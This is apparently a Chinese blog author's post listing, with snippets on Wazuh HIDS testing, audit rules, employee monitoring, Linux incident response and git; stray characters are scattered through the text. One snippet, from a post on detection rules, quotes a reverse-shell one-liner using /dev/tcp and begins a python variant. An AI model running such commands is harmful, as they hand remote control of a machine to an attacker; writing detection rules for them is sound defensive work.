發(fā)簡(jiǎn)信
IP屬地:甘肅
-
安全工程師如何快速適應(yīng)新企業(yè)及一些新員工感悟
加入MT剛好3個(gè)月整捅位,來記錄一些自己的發(fā)現(xiàn)和感悟轧葛。 入職第一周-如何快速進(jìn)入工作狀態(tài) 和所有新人一樣,公司的新人培訓(xùn)計(jì)劃提供了很多了解公司以及如...
-
Wauzh原理簡(jiǎn)析及audit規(guī)則風(fēng)險(xiǎn)評(píng)估
HIDS基本原理 熟悉HIDS的朋友應(yīng)該了解艇搀,服務(wù)器的shell監(jiān)控一般有兩種尿扯,一種依靠Linux的audit審計(jì)功能,比如Wazuh焰雕,一種是重...
-
企業(yè)安全-淺談員工行為監(jiān)控
我目前就職于一家私企的安全部姜胖,主要做安全審計(jì)的工作,很多公司的離職流程沒有考慮過員工的異常行為審計(jì)淀散,18年我在逛微博的時(shí)候看到google的一條...
-
Wauzh自定義反彈shell告警規(guī)則常見反彈: bash -i >& /dev/tcp/ip/port0>&1 python -c"import os,socket,subproc...
-
Wazuh配置使用騰訊企業(yè)郵箱告警
測(cè)試環(huán)境: CentOS Linux release 7.6.1810 Wazuh 3.10.2 1右莱、wazuh服務(wù)器上安裝postfii及相關(guān)...
-
開源HIDS-Wauzh功能測(cè)試一、Wazuh 守護(hù)進(jìn)程及工具進(jìn)程 守護(hù)進(jìn)程 ossec-agentd https://documentation.wazuh.com/3.10...
-
開源HIDS-Wauzh測(cè)試使用
Wazuh簡(jiǎn)介 前端時(shí)間調(diào)研了一些HIDS的開源系統(tǒng): https://github.com/Neo23x0/Fenrir更加方便(不需要安裝代...
-
應(yīng)急響應(yīng)-Linux應(yīng)急排查手冊(cè)
賬號(hào)排查 grep :0: /etc/passwd #檢查是否產(chǎn)生了新用戶档插,和UID慢蜓、GID為0的用戶 stat /etc/passwd #檢查...
-
git blame使用
命令名稱: git-blame - 顯示文件的每一行最后修改的版本和作者 用法: git blame [-c] [-b] [-l...